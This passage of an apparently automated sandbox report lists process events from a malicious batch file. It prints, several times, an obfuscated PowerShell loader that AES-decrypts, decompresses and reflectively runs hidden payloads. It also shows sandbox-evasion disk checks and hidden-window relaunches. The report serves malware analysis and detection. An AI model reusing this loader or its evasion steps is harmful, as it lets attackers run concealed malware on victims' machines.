[blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 
'c:\users\user\desktop\rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 
'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:thuufdhjxkhq{param([outputtype([type])][parameter(position=0)][type[]]$yflwifejwhebpy,[parameter(position=1)][type]$nxinipbkxv)$ymlvqpdcphk=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+''+[char](102)+''+'l'+''+[char](101)+'ct'+[char](101)+'d'+'d'+''+[char](101)+''+[char](108)+'e'+[char](103)+'a'+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+'m'+''+[char](101)+''+[char](109)+''+'o'+''+[char](114)+'y'+[char](77)+''+[char](111)+''+[char](100)+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+''+[char](121)+''+[char](68)+''+[char](101)+''+[char](108)+''+[char](101)+'g'+[char](97)+''+[char](116)+''+[char](101)+'t'+[char](121)+''+[char](112)+''+[char](101)+'',''+[char](67)+''+[char](108)+'a'+'s'+'s'+[char](44)+''+[char](80)+''+'u'+''+[char](98)+'l'+[char](105)+''+[char](99)+','+[char](83)+''+[char](101)+''+[char](97)+''+'l'+''+'e'+''+[char](100)+''+[char](44)+'a'+[char](110)+''+[char](115)+'i'+[char](67)+'l'+[char](97)+''+'s'+''+'s'+''+','+''+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+'l'+''+[char](97)+''+[char](115)+''+'s'+'',[multicastdelegate]);$ymlvqpdcphk.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+'p'+''+[char](101)+''+'c'+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+''+[char](109)+'e,'+'h'+''+'i'+''+[char](100)+''+'e'+''+[char](66)+''+'y'+'s'+[char](105)+''+'g'+''+','+''+[char](80)+'u'+[char](98)+''+'l'+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$yflwifejwhebpy).setimplementationflags(''+[char](82)+''+[char](117)+''+'n'+''+[char](116)+''+[char](105)+'me,m'+[char](97)+''+'n'+''+'a'+''+[char](103)+''+'e'+'d');$ymlvqpdcphk.definemethod(''+'i'+''+'n'+'v'+[char](111
)+'k'+[char](101)+'',''+'p'+''+'u'+''+'b'+'li'+'c'+''+','+''+'h'+''+[char](105)+''+[char](100)+'e'+[char](66)+'y'+'s'+''+[char](105)+''+'g'+''+[char](44)+''+[char](78)+''+'e'+''+'w'+''+[char](83)+''+'l'+'o'+[char](116)+','+'v'+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+'a'+''+[char](108)+'',$nxinipbkxv,$yflwifejwhebpy).setimplementationflags(''+[char](82)+'unt'+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+'a'+''+'n'+'a'+[char](103)+''+'e'+''+[char](100)+'');write-output $ymlvqpdcphk.createtype();}$tbozpeexdclpo=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+'st'+'e'+''+'m'+''+'.'+''+[char](100)+'l'+'l'+'')}).gettype(''+[char](77)+'icr'+'o'+''+'s'+''+'o'+''+[char](102)+''+[char](116)+''+[char](46)+''+'w'+''+[char](105)+'n'+[char](51)+''+'2'+''+[char](46)+''+[char](85)+''+[char](110)+''+[char](115)+'af'+[char](101)+''+[char](78)+'a'+[char](116)+''+'i'+''+'v'+''+'e'+'met'+[char](104)+''+'o'+''+[c
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 
'c:\users\user\desktop\rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 
'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 38_2_0000000140002300
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: dwm.exe, 0000002A.00000000.2786292411.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000002A.00000002.3476487461.000001D159439000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000012.00000002.3405758447.000002A5AD1F0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.3428744701.0000021403320000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3427586529.000002D016A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\cmd.exe Code function: 17_3_00000253FC3E2AF0 cpuid 17_3_00000253FC3E2AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
